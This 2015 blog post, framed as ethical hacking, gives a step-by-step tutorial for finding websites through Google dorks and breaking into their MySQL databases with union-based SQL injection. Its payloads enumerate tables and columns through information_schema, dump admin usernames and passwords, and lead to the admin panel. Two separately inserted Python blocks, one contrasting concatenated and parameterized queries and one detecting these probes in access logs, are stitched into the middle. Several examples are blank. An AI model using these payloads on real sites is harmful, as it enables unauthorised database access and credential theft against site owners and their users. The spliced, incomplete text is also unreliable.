
Tuesday, October 6, 2015

Donning the Shoes of A Hacker to know about SQL Injection

The Internet has undoubtedly made knowledge ubiquitous, but at the same time it has also generated a lot of vulnerabilities. There are many malicious users waiting to find the loopholes in your websites in order to attack them. At the top of the list today are SQL injections, which are the most effective and invasive way to attack.

You can be a victim, if...

Many SQL attacks are reported daily, and there are plenty of websites that depend on data-driven designs to produce dynamic content for their readers. As all these dynamic designs are built on MySQL or another database that depends on SQL, all of them are exposed to the danger.

Getting Acquainted

SQL injection attacks directly hit the database, so you need a good grasp of, or at least preliminary knowledge about, databases before you start. If you are starting the process you can certainly go through some beginner tutorials that cover all you need to know.

What are we discussing here?

In this article, we will discuss how a website is attacked using SQL injection. I am writing this article to show how these attacks make their way into a website and how you can ensure your safety from them. One must not forget that performing a SQL injection attack is circumventing the law and, as we know, flouting the rules has serious repercussions (so be cautious). This article is a step towards ethical hacking.

Thinking like a hacker: step-wise analysis

* First they bypass the logins
* The second step is to access the secret data
* Then they modify the content of the website
* The last step is to shut down the website's MySQL database server

This was a succinct summary; we will now discuss each step in detail.

Step 1: Searching for exposed/vulnerable websites:

Google, being the king of the search engines, works as the holy grail for hackers. To find a list of vulnerable websites, hackers adopt Google's dork list. A Google dork is a search query crafted so that the power of Google's search is used to find hackable websites. There are many tricks to refine the search, but the best one is the “inurl:” operator, which finds websites that are prone to danger.

For example you can type in:

Searching:
1. Copy any of these commands and paste it into the Google search bar.
2. Google will fetch you a list of websites.
3. Then you need to visit each of the websites to check its vulnerability.

Gauging the Vulnerability:

To check whether a website is vulnerable or not, add a single quote (') at the end of the website's URL and press enter. (There should be no space between the single quote and the number.)

For instance:'

If the webpage displayed in the browser remains unchanged, displays a “page not found” error, or displays some other page, then this website is not hackable.

If, after typing this, an error message related to the SQL query appears, then the website is hackable.

For instance, an error message such as:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
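The single-quote test works only because the id value is concatenated straight into the SQL text. The following is an added example (not code from the original article): a constructed SQLite lookup written both ways, showing that the concatenated version raises a syntax error on the probe while the parameterized version treats the very same input as data, so there is no error for an attacker to read.

```python
import sqlite3

# Constructed in-memory table standing in for a site's "news by id" lookup.
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE news (id INTEGER, title TEXT)")
    con.executemany("INSERT INTO news VALUES (?, ?)",
                    [(1, "Welcome"), (2, "Update")])
    return con

def lookup_vulnerable(con, raw_id):
    """Builds the SQL by string concatenation: the id value is parsed as SQL."""
    sql = "SELECT id, title FROM news WHERE id=" + raw_id
    return con.execute(sql).fetchall()

def lookup_safe(con, raw_id):
    """Passes the value as a bound parameter: it is data, never SQL."""
    return con.execute("SELECT id, title FROM news WHERE id=?", (raw_id,)).fetchall()

def probe(fn, raw_id):
    """Runs one lookup on a fresh database and reports whether it returned
    rows or failed with a SQL syntax error (the signal the article relies on)."""
    con = make_db()
    try:
        return ("rows", fn(con, raw_id))
    except sqlite3.OperationalError:
        return ("sql_error", None)
```

The same comparison holds for the "order by n" probe of Step 3: the concatenated form errors out with an out-of-range ORDER BY term, the parameterized form simply finds no row.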

Step 3: Finding the Number of columns in the database:

Now that the hacker knows the website is vulnerable, the next move is to find the number of columns in the database table.

This is not a big task: all they need to do is write “order by n” in place of that single quote (leaving a space between the statement and the number).

Then they keep changing n, starting from 1, 2, …, until an error message stating “unknown column” is displayed.

For eg: order by 1, order by 2, order by 3, order by 4

Keep changing the number until the “unknown column” error pops up.

Let us suppose you get the error message at the 8th number; then the number of columns is n-1, i.e. here it will be 7.

This method is not infallible, so if it is not working you can add “--” at the end of the statement.

For instance: order by 1--

Step 4: Knowing the Vulnerable columns:

The hackers use “union select columns_sequence” to find the vulnerable columns. In this step the “order by n” statement is replaced with this one. After that the id value is swapped for a negative number, i.e. id=-2, though on some websites there is no need to do so.

You also need to replace columns_sequence with the numbers from 1 to x-1, separated by commas (as the example below shows).

For eg:

Let us suppose that the number of columns is 7; then the query will be: union select 1,2,3,4,5,6,7--

If this trick does not work, you can also try: and 1=2 union select 1,2,3,4,5,6,7--

Step 5: Fetching the version, user and database

The next trick is to place “version()” in place of the numeral 3.

For eg: and 1=2 union select 1,2,version(),4,5,6,7--

After doing so you will see a version such as 5.0 or 6.3 or similar.

Now, to find user() and database(), you just need to put them one by one in the place of version().

For eg: and 1=2 union select 1,2,user(),4,5,6,7--
and 1=2 union select 1,2,database(),4,5,6,7--

Moreover, if the above trick does not work, you can try this one: and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7--

Step 6: Finding the Table Name

Finding the table name depends on the version of MySQL. If the aforementioned query returned version 5 or above, follow these steps. First, replace the numeral 3 with “group_concat(table_name)” and add “from information_schema.tables where table_schema=database()”.

You need to use the above query like this: and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--

This query will fetch you a list of the table names. Then you need to find a table related to users or admin.

After this you need to pick the “admin” table.

If the site runs version 4 or any other, you need to guess the table names. This is why it is difficult to perform SQL injection on version 4.

Step 7: Searching the Column Name

To find the column names you need to replace “group_concat(table_name)” with “group_concat(column_name)”

and then add “FROM information_schema.columns WHERE table_name=mysqlchar--” in place of “from information_schema.tables where table_schema=database()--”.

This step is a crucial one, as you need to convert the table name into a MySQL CHAR() string and write it in place of mysqlchar.

Find MysqlChar() for the table name:
First of all install the HackBar addon:

Now you need to navigate to the following path:

Now copy the code and paste it in place of “mysqlchar” in the URL.
For eg: and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--

Running this will fetch us the list of all the column names:
admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pass,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password etc.

Now write group_concat(columnname,0x3a,anothercolumnname) in place of group_concat(column_name).

Replace columnname and anothercolumnname with two of the columns listed above.

Then write “from table_name” in place of “from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)”.

For eg:
    and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--

You won't be lucky all the time; you will get errors stating that a column was not found, so you need to try other columns as well.

You can find the columns holding usernames and passwords.

If a website has user accounts, this can prove to be a golden goose for hackers.

Step 8: Fetching the Admin panel:

You need to start by trying URLs like:

If you are lucky, you will find your victim's admin URL like this; otherwise keep trying other permutations and combinations.
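Every stage of the walkthrough above leaves a distinctive footprint in the web server's access log: a trailing quote on a numeric parameter, an "order by n" probe, a "union select", and the information_schema / version() lookups. The following is an added example (not from the original article) that runs simple detection rules over a few constructed log lines and counts hits per client; the log lines, IP addresses and rule names are all made up for the illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (not real traffic), Apache combined format, trimmed.
SAMPLE_LOG = """\
10.0.0.5 - - [06/Oct/2015:10:01:02 +0000] "GET /news.php?id=2 HTTP/1.1" 200 5120
10.0.0.7 - - [06/Oct/2015:10:01:09 +0000] "GET /news.php?id=2%27 HTTP/1.1" 500 312
10.0.0.7 - - [06/Oct/2015:10:01:15 +0000] "GET /news.php?id=2+order+by+8-- HTTP/1.1" 500 318
10.0.0.7 - - [06/Oct/2015:10:01:31 +0000] "GET /news.php?id=-2+union+select+1,2,version(),4,5,6,7-- HTTP/1.1" 200 4890
10.0.0.7 - - [06/Oct/2015:10:02:04 +0000] "GET /news.php?id=-2+union+select+1,2,group_concat(table_name),4,5,6,7+from+information_schema.tables+where+table_schema=database()-- HTTP/1.1" 200 5011
10.0.0.9 - - [06/Oct/2015:10:02:40 +0000] "GET /search.php?q=o%27neill HTTP/1.1" 200 2201
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# One rule per stage of the walkthrough; applied to the URL-decoded request path.
RULES = [
    ("quote_probe",  re.compile(r"=\d+'(?:$|&)")),                       # ' appended to a numeric id
    ("column_count", re.compile(r"\border\s+by\s+\d+", re.I)),            # order by n enumeration
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("schema_enum",  re.compile(r"information_schema\.|group_concat\s*\(", re.I)),
    ("fingerprint",  re.compile(r"\b(?:version|user|database)\s*\(\s*\)|@@version", re.I)),
]

def classify(line):
    """Returns (ip, status, [matched rule names]) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = unquote_plus(m.group("path"))   # %27 -> ', + -> space, so the rules see plain text
    hits = [name for name, rx in RULES if rx.search(decoded)]
    return m.group("ip"), int(m.group("status")), hits

def suspicious_clients(log_text, min_hits=2):
    """Sums rule hits per client IP; a client at or above min_hits is worth escalating."""
    counts = {}
    for line in log_text.splitlines():
        parsed = classify(line)
        if parsed and parsed[2]:
            counts[parsed[0]] = counts.get(parsed[0], 0) + len(parsed[2])
    return {ip: n for ip, n in counts.items() if n >= min_hits}
```

Note that the quote rule only fires when the quote follows a purely numeric value, so the legitimate search for "o'neill" is not flagged; the 500 responses on the first two probes are the server-side counterpart of the error page the article tells the reader to look for.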

Author Biography:

Samuel Dawson has shared the article above on how a SQL injection can be performed on a website. Currently he is involved in converting PSD to HTML files for Designs2html Ltd.